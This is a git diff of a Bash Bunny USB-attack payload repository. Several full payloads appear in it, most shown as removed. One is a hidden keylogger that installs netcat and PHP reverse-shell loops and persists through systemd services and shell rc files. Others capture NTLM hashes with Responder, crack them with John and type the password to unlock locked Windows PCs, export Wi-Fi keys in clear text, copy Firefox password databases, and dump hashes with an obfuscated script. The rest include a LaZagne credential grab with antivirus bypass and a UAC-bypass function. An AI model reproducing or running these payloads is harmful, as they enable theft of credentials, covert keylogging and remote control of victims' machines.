||||
disk=$(echo $lol | awk '{print $1}')
|
||||
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||
cp -r $mntt/tools/xinput /var/tmp/.system/
|
||||
cp -r $mntt/payloads/library/bunnyLogger2/clctrl /var/tmp/.system/
|
||||
cp -r $mntt/payloads/library/bunnyLogger2/nc /var/tmp/.system/
|
||||
chmod +x /var/tmp/.system/nc
|
||||
echo -e "name=\$(date +\"%y-%m-%d-%T\")\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test > /var/tmp/.system/logs/\$name.log &\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/clctrl
|
||||
chmod +x /var/tmp/.system/xinput
|
||||
echo -e "while :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone &\nwhile :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",5555);exec("\"/var/tmp/.system/./clctrl "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||
chmod +x /var/tmp/.system/systemBus
|
||||
mkdir -p ~/.config/systemd/user
|
||||
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||
chmod +x /var/tmp/.system/reboot
|
||||
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now systemBUS.service
|
||||
systemctl --user start --now systemBUS.service
|
||||
systemctl --user enable --now reboot.service
|
||||
systemctl --user start --now reboot.service
|
||||
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
|
||||
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
||||
Binary file not shown.
@@ -1,4 +0,0 @@
|
||||
#!/bin/bash
|
||||
loc=$HOME/.config/bunnyLogger
|
||||
rm -rf $loc
|
||||
sudo rm /usr/local/bin/bunnyLoggerMgr
|
||||
@@ -1,111 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
#Author: rf_bandit
|
||||
#Version: Version 1.0
|
||||
#Credit: Hak5Darren, Mubix, catatonic, mame82
|
||||
#Firmware: 1.7
|
||||
#Date: May 2023
|
||||
#
|
||||
# Options
|
||||
RESPONDER_OPTIONS="-w -r -d -P"
|
||||
LOOTDIR=/root/udisk/loot/bunnypicker
|
||||
WORDFILE= <PATH TO DICTIONARY HERE>
|
||||
#eg /tools/john/password.lst
|
||||
# or install via tools folding in arming mode (/tools/<wordlist>)
|
||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
|
||||
# Check for responder and john
|
||||
REQUIRETOOL responder
|
||||
REQUIRETOOL john
|
||||
|
||||
# Setup Attack
|
||||
LED SETUP
|
||||
|
||||
# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
|
||||
ATTACKMODE HID RNDIS_ETHERNET
|
||||
#ATTACKMODE ECM_ETHERNET
|
||||
|
||||
# Set convenience variables
|
||||
GET TARGET_HOSTNAME
|
||||
GET TARGET_IP
|
||||
|
||||
# Setup named logs in loot directory
|
||||
mkdir -p $LOOTDIR
|
||||
HOST=${TARGET_HOSTNAME}
|
||||
# If hostname is blank set it to "noname"
|
||||
[[ -z "$HOST" ]] && HOST="noname"
|
||||
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
|
||||
COUNT=$((COUNT+1))
|
||||
mkdir -p $LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# As a backup also copy logs to a loot directory in /root/loot/
|
||||
mkdir -p /root/loot/bunnypicker/$HOST-$COUNT
|
||||
|
||||
# Check target IP address. If unset, blink RED and end.
|
||||
if [ -z "${TARGET_IP}" ]; then
|
||||
LED FAIL2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Set LED yellow, run attack
|
||||
LED ATTACK
|
||||
cd /tools/responder
|
||||
|
||||
# Clean logs directory
|
||||
rm logs/*
|
||||
|
||||
# Run Responder with specified options
|
||||
python Responder.py -I usb0 $RESPONDER_OPTIONS &
|
||||
|
||||
# Wait until NTLM log is found
|
||||
until [ -f logs/*NTLM* ]
|
||||
do
|
||||
# Ima just loop here until NTLM logs are found
|
||||
sleep 1
|
||||
done
|
||||
|
||||
# copy logs to loot directory
|
||||
cp logs/* /root/loot/bunnypicker/$HOST-$COUNT
|
||||
cp logs/* $LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# Sync USB disk filesystem
|
||||
sync
|
||||
|
||||
#kill responder
|
||||
killall python
|
||||
killall python
|
||||
killall python
|
||||
|
||||
#Cracking begins!
|
||||
cd /tools/john
|
||||
LED STAGE1
|
||||
#This should be a small wordlist as we are looking for lowhanging fuit. We can do 100K passwords in ~1 second.
|
||||
#We could go CUCMBER PLAID here but its probably not needed
|
||||
./john --wordlist=$WORDFILE --pot=/root/loot/bunnypicker/$HOST-$COUNT/john.pot /root/loot/bunnypicker/$HOST-$COUNT/*.txt
|
||||
|
||||
|
||||
# Check john.pot If empty blink RED and end. Move to offline attack.
|
||||
if [[ -z $(grep '[^[:space:]]' /root/loot/bunnypicker/$HOST-$COUNT/john.pot) ]]; then
|
||||
LED FAIL3
|
||||
exit 1
|
||||
fi
|
||||
|
||||
#This will copy our cracked password to the loot folder for future use.
|
||||
LED STAGE2
|
||||
awk NR==1 /root/loot/bunnypicker/$HOST-$COUNT/john.pot | cut -d: -f2 > $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt
|
||||
echo -n "STRING " > $PAYLOAD_DIR/pass.txt
|
||||
cat $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt >> $PAYLOAD_DIR/pass.txt
|
||||
|
||||
#This should unlock the machine with our cracked password.
|
||||
#$PAYLOAD_DIR would not work with QUACK
|
||||
QUACK ESC
|
||||
DELAY 100
|
||||
QUACK $SWITCH_POSITION/pass.txt
|
||||
QUACK ENTER
|
||||
rm $PAYLOAD_DIR/pass.txt
|
||||
|
||||
LED CLEANUP
|
||||
sync
|
||||
|
||||
# When the light turns green its a hacked machine.
|
||||
LED FINISH
|
||||
@@ -1,117 +0,0 @@
|
||||
# Bunnypicker (Win10 Lockpicker for Bash Bunny)
|
||||
.______ __ __ .__ __. .__ __. ____ ____ .______ __ ______ __ ___ _______ .______
|
||||
| _ \ | | | | | \ | | | \ | | \ \ / / | _ \ | | / || |/ / | ____|| _ \
|
||||
| |_) | | | | | | \| | | \| | \ \/ / | |_) | | | | ,----'| ' / | |__ | |_) |
|
||||
| _ < | | | | | . ` | | . ` | \_ _/ | ___/ | | | | | < | __| | /
|
||||
| |_) | | `--' | | |\ | | |\ | | | | | | | | `----.| . \ | |____ | |\ \----.
|
||||
|______/ \______/ |__| \__| |__| \__| |__| | _| |__| \______||__|\__\ |_______|| _| `._____|
|
||||
,
|
||||
/| __
|
||||
/ | ,-~ /
|
||||
Y :| // /
|
||||
| jj /( .^
|
||||
>-"~"-v"
|
||||
/ Y
|
||||
jo o |
|
||||
( ~T~ j
|
||||
>._-' _./
|
||||
/ "~" |
|
||||
Y _, |
|
||||
/| ;-"~ _ l
|
||||
/ l/ ,-"~ \
|
||||
\//\/ .- \
|
||||
Y / Y -Row
|
||||
l I !
|
||||
]\ _\ /"\
|
||||
(" ~----( ~ Y. )
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
|
||||
Author: rf_bandit
|
||||
Version: Version 1.0
|
||||
Credit: Hak5Darren, Mubix, catatonic, mame82
|
||||
Firmware: 1.7
|
||||
Target: Windows 10/11
|
||||
Date: May 2023
|
||||
|
||||
## Description
|
||||
This is based on Quickcreds, Jackalope, and Win10Lockpicker (for the OG P4wnP1)
|
||||
Snags credentials from locked machines
|
||||
Implements a responder attack. Saves creds to the loot folder on the USB Disk
|
||||
Looks for *NTLM* log files
|
||||
Cracks hash with John the Ripper. Best with a smaller dictionary.
|
||||
Saves cracked hash to loot folder
|
||||
Quacks password and unlocks machine
|
||||
|
||||
On a current (May 2023) Win10/Win11 machine, it shouldn't take more about 35 seconds to get a hash.
|
||||
If attack stage lasts longer than ~1, try disconnecting/reconnecting from wifi/network.
|
||||
We can run through 100K simple passwords in 1 second.
|
||||
Best time I got was 29.60 seconds from Bash Bunny boot to machine unlock.
|
||||
|
||||
|
||||
|
||||
## Configuration
|
||||
.
|
||||
Configured for Windows. Not tested on Mac/*nix
|
||||
The path to the wordfile needs to be configured, eg /tools/<your-file-here> or /tools/john/password.lst (included) . The most straightforwrd way to get a large wordlist is to put it in the /tools folder in arming mode. A future version could check for a wordlist in /tools and if not found fallback to the included /tools/john/password.lst.
|
||||
|
||||
|
||||
## Requirements
|
||||
|
||||
Responder must be in /tools/responder/
|
||||
(Can be otained from https://forums.hak5.org/topic/40971-info-tools/)
|
||||
JtR must be in /tools/john
|
||||
Requires initial setup (below)
|
||||
|
||||
## Initial Setup
|
||||
Install responder from https://forums.hak5.org/topic/40971-info-tools/
|
||||
|
||||
Replace /etc/apt/sources.list with:
|
||||
deb http://archive.debian.org/debian/ jessie main non-free contrib
|
||||
deb-src http://archive.debian.org/debian/ jessie main non-free contrib
|
||||
deb http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
|
||||
deb-src http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
|
||||
|
||||
apt update (DO NOT RUN apt upgrade as it will break RNDIS_ETHERNET. Not entirely clear why.)
|
||||
|
||||
The john package included can't handle NTLM hashes so we will make our own.
|
||||
Install gcc and git if you don't have them.
|
||||
|
||||
apt-get install gcc
|
||||
|
||||
apt-get install git
|
||||
git config --global http.sslverify "false" (this is insecure but I'm not worried)
|
||||
|
||||
git clone https://github.com/openwall/john
|
||||
|
||||
cd john
|
||||
./configure && make
|
||||
mv run /tools/john
|
||||
cd ..
|
||||
rm -r john (not required but a space saving measure)
|
||||
|
||||
|
||||
## STATUS
|
||||
|
||||
|
||||
| Status | Description |
|
||||
| ------------------- | ---------------------------------------- |
|
||||
| LED SETUP | Starting |
|
||||
| LED ATTACK | Grabbing creds |
|
||||
| LED STAGE1 | Running JtR |
|
||||
| LED STAGE2 | Unlocking |
|
||||
| LED CLEANUP | Sync to disk |
|
||||
| LED FINISH | Trap is clean |
|
||||
| FAIL1 | Responder not found at /tools/responder |
|
||||
| FAIL2 | Target did not aquire IP address |
|
||||
| FAIL3 | Hash not cracked - move to offline attack|
|
||||
|
||||
## ADDITIONAL NOTES
|
||||
|
||||
For debugging its better to use LED B for STAGE1 and LED W for STAGE2 because its easier to pinpoint failure.
|
||||
A future version could check for a wordlist in /tools and if not found fallback to /tools/john/password.lst.
|
||||
Might also steal catatonic's use of the switch (very cool) to initiate password quacking to make the payload more versatile on both locked
|
||||
and unlocked machines.
|
||||
|
||||
This was fun to make. Thanks to everyone who put in all the hard work before me.
|
||||
|
||||
@@ -1,8 +1,16 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: BunnyTap
|
||||
# Author: Whistle Master
|
||||
# Version: 1.0
|
||||
# Title: BunnyTap
|
||||
# Version: 1.0
|
||||
# Author: Whistle Master
|
||||
# Props: Samy Kamkar
|
||||
# Description:
|
||||
# PoisonTap for the BashBunny
|
||||
#
|
||||
# LEDS:
|
||||
# White Blinking: No DNSSpoof found
|
||||
# Green Blinking: Starting Attack
|
||||
# Blue: Started Attack
|
||||
|
||||
# Enable Ethernet (RNDIS = Windows, ECM = mac/*nix)
|
||||
#ATTACKMODE RNDIS_ETHERNET
|
||||
@@ -35,4 +43,4 @@ fi
|
||||
LED G 200
|
||||
setupNetworking
|
||||
startBunnyTap
|
||||
LED B 0
|
||||
LED B 0
|
||||
|
||||
@@ -1,17 +1,24 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Bunnyhound
|
||||
# Author: golem445
|
||||
# Version: 1.0
|
||||
# Dependencies: Impacket, gohttp
|
||||
# Runtime: Dependent on domain size
|
||||
#
|
||||
# Title: Bunnyhound
|
||||
# Author: golem445
|
||||
# Version: 1.0
|
||||
# Dependencies: Impacket, gohttp
|
||||
# Runtime: Dependent on domain size
|
||||
#
|
||||
# Description:
|
||||
# Sets up Ethernet and HID keyboard interfaces simultaneously,
|
||||
# then uses HID to import Sharphound into memory via local
|
||||
# web server and execute the attack. Results are exported
|
||||
# to the loot directory via SMB.
|
||||
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Yellow Blinking: Attack Phase 1
|
||||
# Yellow Double Blinking: Attack Phase 2
|
||||
# White Rapid Blinking: Cleaning Up
|
||||
# Green: Attack Finished
|
||||
#
|
||||
# Start Setup
|
||||
LED SETUP
|
||||
|
||||
@@ -61,4 +68,4 @@ rm -rf /loot/smb/*
|
||||
sync
|
||||
|
||||
# Complete
|
||||
LED FINISH
|
||||
LED FINISH
|
||||
|
||||
@@ -1,28 +1,25 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: DumpCreds 2.1
|
||||
# Author: QDBA
|
||||
# Version: 2.1.0
|
||||
# Build: 1004
|
||||
# Category: Exfiltration
|
||||
# Target: Windows Windows 10 (Powershell)
|
||||
# Attackmodes: HID, Ethernet
|
||||
# !!! works only with Bash Bunny FW 1.1 and up !!!
|
||||
# Title: DumpCreds 2.1
|
||||
# Author: QDBA
|
||||
# Version: 2.1.0
|
||||
# Build: 1004
|
||||
# Target: Windows 10
|
||||
# Attack Modes: HID, RNDIS_ETHERNET
|
||||
# Description:
|
||||
# Works only with Bash Bunny FW 1.1 and up.
|
||||
#
|
||||
#
|
||||
# LED Status
|
||||
# ----------------------- + --------------------------------------------
|
||||
# SETUP + Setup
|
||||
# FAIL + No /tools/impacket/examples/smbserver.py found
|
||||
# FAIL2 + Target did not acquire IP address
|
||||
# Yellow single blink + Initialization
|
||||
# Yellow double blink + HID Stage
|
||||
# Yellow triple blink + Wait for IP coming up
|
||||
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
|
||||
# Cyan inv quint blink + Powershell scripts running
|
||||
# White fast blink + Cleanup, copy Files to <root>/loot
|
||||
# Green + Finished
|
||||
# ----------------------- + --------------------------------------------
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Red: No /tools/impacket/examples/smbserver.py found
|
||||
# Red Blinking: Target did not acquire IP address
|
||||
# Yellow Blink: Initialization
|
||||
# Yellow Double Blink: HID Stage
|
||||
# Yellow Triple Blink: Wait for IP coming up
|
||||
# Cyan Blink: Wait for Handshake (SMBServer Coming up)
|
||||
# Cyan Quintuple Blink: Powershell scripts running
|
||||
# White Rapid Blink: Cleanup, copy Files to <root>/loot
|
||||
# Green: Finished
|
||||
|
||||
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
|
||||
|
||||
|
||||
@@ -1,6 +0,0 @@
|
||||
mkdir %~dp0\loot\%COMPUTERNAME%
|
||||
cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear
|
||||
C: cd \D %appdata%\mozilla\firefox\profiles\
|
||||
cd %appdata%\mozilla\firefox\profiles\*.default-release\
|
||||
copy key4.db %~dp0\loot\%COMPUTERNAME%
|
||||
copy logins.json %~dp0\loot\%COMPUTERNAME%
|
||||
@@ -1,45 +0,0 @@
|
||||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
# Full Description
|
||||
# ----------------
|
||||
# Attacks an Unlocked Windows Machine
|
||||
# Payload targets:
|
||||
# - All WiFi creds
|
||||
# - Firefox Saved Password Database
|
||||
#
|
||||
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
|
||||
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
|
||||
|
||||
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
|
||||
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
|
||||
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
|
||||
|
||||
|
||||
# KNOWN ISSUES
|
||||
# ---------------
|
||||
# Loot is saved in Payloads/switch#/loot
|
||||
|
||||
|
||||
# Files
|
||||
# -----
|
||||
# - payload.txt: Starts the attack. All configuration contained in this file.
|
||||
# - FireSnatcher.bat: Worker that grabs Creds
|
||||
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
# - Place the payload.txt and FireSnatcher.bat in Payload folder
|
||||
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
|
||||
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
|
||||
|
||||
**LED meanings**
|
||||
- Magenta: Initial setup – about 1 – 3 seconds
|
||||
- Single yellow blink: Attack in progress
|
||||
- Green rapid flash, then solid, then off: Attack complete
|
||||
@@ -1,78 +0,0 @@
|
||||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
# Full Description
|
||||
# ----------------
|
||||
# Attacks an Unlocked Windows Machine
|
||||
# Payload targets:
|
||||
# - All WiFi creds
|
||||
# - Firefox Saved Password Database
|
||||
#
|
||||
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
|
||||
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
|
||||
|
||||
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
|
||||
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
|
||||
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
|
||||
|
||||
|
||||
# KNOWN ISSUES
|
||||
# ---------------
|
||||
# Loot is saved in Payloads/switch#/loot
|
||||
|
||||
|
||||
# Files
|
||||
# -----
|
||||
# - payload.txt: Starts the attack. All configuration contained in this file.
|
||||
# - FireSnatcher.bat: Worker that grabs Creds
|
||||
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
# - Place the payload.txt and FireSnatcher.bat in Payload folder
|
||||
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
|
||||
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
|
||||
|
||||
# LEDs
|
||||
# ----
|
||||
# Magenta: Initial setup – about 1 – 3 seconds
|
||||
# Single yellow blink: Attack in progress
|
||||
# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed
|
||||
|
||||
# Options
|
||||
# -------
|
||||
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
|
||||
BB_NAME="BashBunny"
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
LED SETUP
|
||||
|
||||
|
||||
# Attack
|
||||
# ------
|
||||
ATTACKMODE HID STORAGE
|
||||
Q DELAY 500
|
||||
LED ATTACK
|
||||
Q DELAY 100
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING powershell Start-Process powershell
|
||||
Q ENTER
|
||||
Q DELAY 7000
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"
|
||||
Q ENTER
|
||||
Q DELAY 8000
|
||||
Q STRING EXIT
|
||||
Q ENTER
|
||||
sync
|
||||
LED FINISH
|
||||
Q DELAY 1500
|
||||
shutdown now
|
||||
|
||||
File diff suppressed because one or more lines are too long
@@ -1,20 +0,0 @@
|
||||
**Title: HashDumpBunny**
|
||||
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
**Instruction:**
|
||||
|
||||
This payload will run an obfuscated script to dump user hashes. If you don't trust this obfuscated .bat file, you should run it within a save space first - which should be best practice anyways ;-)
|
||||
|
||||
#
|
||||
**!Depending on your Windows version, this might not work as intended!**
|
||||
#
|
||||
**Instruction:**
|
||||
|
||||
Place BunnyDump.bat in the same payload switch-folder as your payload.txt
|
||||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.txt file and try to crack the hashes.
|
||||

|
||||
Binary file not shown.
|
Before Width: | Height: | Size: 13 KiB |
@@ -1,44 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: HashDumpBunny
|
||||
# Description: Dump user hashes with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
GET SWITCH_POSITION
|
||||
DUCKY_LANG de
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||
|
||||
LED STAGE1
|
||||
|
||||
#After you have adapted the delays for your target, add "-W hidden"
|
||||
Q DELAY 1000
|
||||
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
Q ALT j
|
||||
Q DELAY 250
|
||||
|
||||
Q DELAY 250
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\BunnyDump.bat')"
|
||||
Q DELAY 250
|
||||
Q STRING " ;mv out.txt ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||
Q DELAY 250
|
||||
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
||||
Q DELAY 250
|
||||
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
||||
@@ -3,11 +3,24 @@
|
||||
# Title: Jackalope
|
||||
# Author: catatonic
|
||||
# Version: 1.1.0
|
||||
# Target: Windows
|
||||
# Attack Modes: HID, RNDIS_ETHERNET
|
||||
# Description:
|
||||
# Uses Metasploit to launch an SMB password stealing attack.
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Cyan Blink: Clearing Password
|
||||
# Yellow Blink: Attack Phase 1
|
||||
# Yellow Double Blink: Attack Phase 2
|
||||
# Red Blink: Attack Failure
|
||||
# Red Fast Blink: Recon Failure
|
||||
# Green: Attack Finished
|
||||
|
||||
# Check readiness & prepare environment
|
||||
LED SETUP
|
||||
|
||||
REQUIRETOOL metasploit-framework
|
||||
# REQUIRE-TOOL metasploit-framework
|
||||
ATTACKMODE HID RNDIS_ETHERNET
|
||||
|
||||
# Ensure loot is available for recording results.
|
||||
@@ -26,9 +39,11 @@ COUNT=$((COUNT+1))
|
||||
LOOTDIR=$LOOTBASE/$TARGET_HOSTNAME-$COUNT
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
source /etc/profile.d/rvm.sh
|
||||
rvm --default use 2.6.2 >> $LOOTDIR/log.txt
|
||||
MSF_DIR=/tools/metasploit-framework
|
||||
|
||||
# Save environment information:
|
||||
# Save environment informaiton:
|
||||
echo "PAYLOAD_DIR: $PAYLOAD_DIR" >> $LOOTDIR/log.txt
|
||||
echo "MSF_DIR: $MSF_DIR" >> $LOOTDIR/log.txt
|
||||
echo "LOOTDIR: $LOOTDIR" >> $LOOTDIR/log.txt
|
||||
|
||||
@@ -26,9 +26,7 @@ Uses ethernet to attempt dictionary attacks against passwords. When the password
|
||||
To clear a stored password move the switch to switch3 (aka arming mode) after the payload runs and displays GREEN. The status light will change to SPECIAL (cyan) indicating the password has been removed. Positioning the switch to switch1 or switch2 will re-initiate the attack.
|
||||
|
||||
## Configuration
|
||||
You must have a Metasploit installation up and running in path /tools/metasploit-framework/
|
||||
Information and instructions for the installation of additional tools to the Bash Bunny can be found [here](https://docs.hak5.org/hc/en-us/articles/360010554133-Installing-and-using-additional-tools).
|
||||
No further initial configuration is required for Firmware v1.6+.
|
||||
No initial configuration is required for bunny firmware v1.6+.
|
||||
|
||||
### Per attack configuration
|
||||
1. userlist.txt contains usernames to use in attack.
|
||||
|
||||
@@ -1,40 +0,0 @@
|
||||
# LaZassword
|
||||
Password recovery payload for the BashBunny, using LaZagne.
|
||||
|
||||
• Author: kuyaya
|
||||
|
||||
• Firmware support: I tested it for 1.6, but it should work for all firmwares
|
||||
|
||||
• Target: Windows
|
||||
|
||||
• Creds: [PoSHMagiC0de](https://github.com/PoSHMagiC0de)
|
||||
|
||||
## Description
|
||||
The payload uses powershell to bypass the AV and stores the output of lazagne (runned as admin) in a lootfile.
|
||||
|
||||
Payload running time: ~ 1 minute
|
||||
|
||||
You can rely on the LED FINISH. You don't have to do anything on the victim computer, as long as he has Windows Defender as the AV. No keyboard change, no safe eject, just plug it in, wait for the LED FINISH, plug it out.
|
||||
|
||||
Only works with Windows Defender as victim AV.
|
||||
|
||||
The BashBunny ejects itself. You don't have to do anything.
|
||||
|
||||
## Configuration
|
||||
You need to download the latest version of LaZagne from the [release page of LaZagne](https://github.com/AlessandroZ/LaZagne/releases).
|
||||
|
||||
Be sure to temporarily disable the AV so it doesn't get removed during download and installation. Then make a Zip-file (not 7zip or rar, just the normal zip format that windows provides) out of it, and place it in the /root folder of the Bunny.
|
||||
Example:
|
||||
> G:\lazagne.zip\lazagne.exe
|
||||
|
||||
Then just copy-paste the payload.txt and the lazassword.ps1 into one of the switch folders. (Doesn't matter if switch1 or switch2)
|
||||
|
||||
***Be sure to change the DUCKY_LANG in the payload.txt***
|
||||
|
||||
***Be sure to change the "administrators" in bypass.ps1 on line 42***
|
||||
Change it to "administrators" in your language. Example: German people should replace it by "Administratoren".
|
||||
|
||||
If you have an idea on how to improve the payload or if you have an issue (e.g. the payload itself is not working) don't hesitate to PM me by E-Mail or at the [Hak5 Forums](https://forums.hak5.org/profile/63440-kuyaya/).
|
||||
|
||||
## Latest update information
|
||||
Adding the ability to bypass UAC. Creds go to PoSHMagiC0de.
|
||||
@@ -1,96 +0,0 @@
|
||||
function Invoke-TaskCleanerBypass {
|
||||
[CmdletBinding()]
|
||||
Param(
|
||||
[Parameter(Mandatory=$true,Position=0)]
|
||||
[ValidateSet("Encoded","File")]
|
||||
[string]$Method,
|
||||
[Parameter(Mandatory=$false)]
|
||||
[switch]$Hide
|
||||
)
|
||||
|
||||
DynamicParam {
|
||||
if($Method -eq "File") {
|
||||
$paramname = "FileName"
|
||||
} else {
|
||||
$paramname = "EncodedCommand"
|
||||
}
|
||||
#create a new ParameterAttribute Object
|
||||
$MethodAttribute = New-Object System.Management.Automation.ParameterAttribute
|
||||
#$testaddAttribute.Position = 3
|
||||
$MethodAttribute.Mandatory = $true
|
||||
#$MethodAttribute.HelpMessage = "My test help message"
|
||||
|
||||
#create an attributecollection object for the attribute we just created.
|
||||
$attributeCollection = new-object System.Collections.ObjectModel.Collection[System.Attribute]
|
||||
|
||||
#add our custom attribute
|
||||
$attributeCollection.Add($MethodAttribute)
|
||||
|
||||
#add our paramater specifying the attribute collection
|
||||
$MethodParam = New-Object System.Management.Automation.RuntimeDefinedParameter($paramname, [string], $attributeCollection)
|
||||
|
||||
#expose the name of our parameter
|
||||
$paramDictionary = New-Object System.Management.Automation.RuntimeDefinedParameterDictionary
|
||||
$paramDictionary.Add($paramname, $MethodParam)
|
||||
return $paramDictionary
|
||||
}
|
||||
|
||||
|
||||
|
||||
Process {
|
||||
#If not in the Administrators group, do not run.
|
||||
if(!(gwmi -class win32_groupuser | Where {$_.GroupComponent -match "Administrators" -and $_.PartComponent -match $env:username})) {
|
||||
Return
|
||||
}
|
||||
#If not Windows 8.1 or higher then exit.
|
||||
$OSV = (gwmi -class win32_operatingsystem -Property Version).Version -split "\."
|
||||
if(!(($OSV[0] -ge 10) -or ($OSV[0] -eq 6 -and $OSV[1] -eq 3))){
|
||||
Return
|
||||
}
|
||||
|
||||
#Set Variables
|
||||
if($Method -eq "File") {
|
||||
$File = $PSBoundParameters.Filename
|
||||
Try {
|
||||
$File = (Resolve-Path $File).Path
|
||||
